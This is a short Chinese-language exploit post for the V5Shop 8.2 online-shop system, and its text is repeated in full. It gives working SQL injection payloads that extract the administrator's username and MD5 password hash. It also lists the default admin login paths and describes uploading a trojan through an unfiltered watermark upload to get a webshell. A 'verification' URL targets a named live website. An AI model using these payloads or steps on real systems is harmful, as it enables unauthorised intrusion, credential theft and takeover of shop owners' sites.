### 简要描述 V5Shop网店系统是上海威博旗下一款B2C网上开店软件产品,适合中小型企业及个人快速构建个性化网上商店。该程序V5shop8.2存在通杀SQL注入漏洞且非常严重,可直接爆出管理员帐号密码,后台上传也可做任何过滤。 ### 利用EXP: ``` /commond.aspx?id=1 and 1=(select top 1 [name] from web_admin) ``` 上面这个可以直接显示出管理员用户名  ``` /commond.aspx?id=1 and 1=(select top 1 [pass] from web_admin) ``` 上面这个可以显示MD5密码  默认后台地址: ``` /weblogin/Login.aspx ``` 或者后台地址: ``` /admin/Login.aspx ``` 登陆后台后,拿webshell的方法非常简单,直接系统管理—参数设置—水印设置  这里没做任何过滤可上传任意木马文件格式 木马上传后地址:UploadFile/Picture/木马名称.asp  ### 验证地址: ``` http://www.diroadint.com/commond.aspx?id=1%20and%20@@version>0 ```...
### 简要描述 V5Shop网店系统是上海威博旗下一款B2C网上开店软件产品,适合中小型企业及个人快速构建个性化网上商店。该程序V5shop8.2存在通杀SQL注入漏洞且非常严重,可直接爆出管理员帐号密码,后台上传也可做任何过滤。 ### 利用EXP: ``` /commond.aspx?id=1 and 1=(select top 1 [name] from web_admin) ``` 上面这个可以直接显示出管理员用户名  ``` /commond.aspx?id=1 and 1=(select top 1 [pass] from web_admin) ``` 上面这个可以显示MD5密码  默认后台地址: ``` /weblogin/Login.aspx ``` 或者后台地址: ``` /admin/Login.aspx ``` 登陆后台后,拿webshell的方法非常简单,直接系统管理—参数设置—水印设置  这里没做任何过滤可上传任意木马文件格式 木马上传后地址:UploadFile/Picture/木马名称.asp  ### 验证地址: ``` http://www.diroadint.com/commond.aspx?id=1%20and%20@@version>0 ``` 
